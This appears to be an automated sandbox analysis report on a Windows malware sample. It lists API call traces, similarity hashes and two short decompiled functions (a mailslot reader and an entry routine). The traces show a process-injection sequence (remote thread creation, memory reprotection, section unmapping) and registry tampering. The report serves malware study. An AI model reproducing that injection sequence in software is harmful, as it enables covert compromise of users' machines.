  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
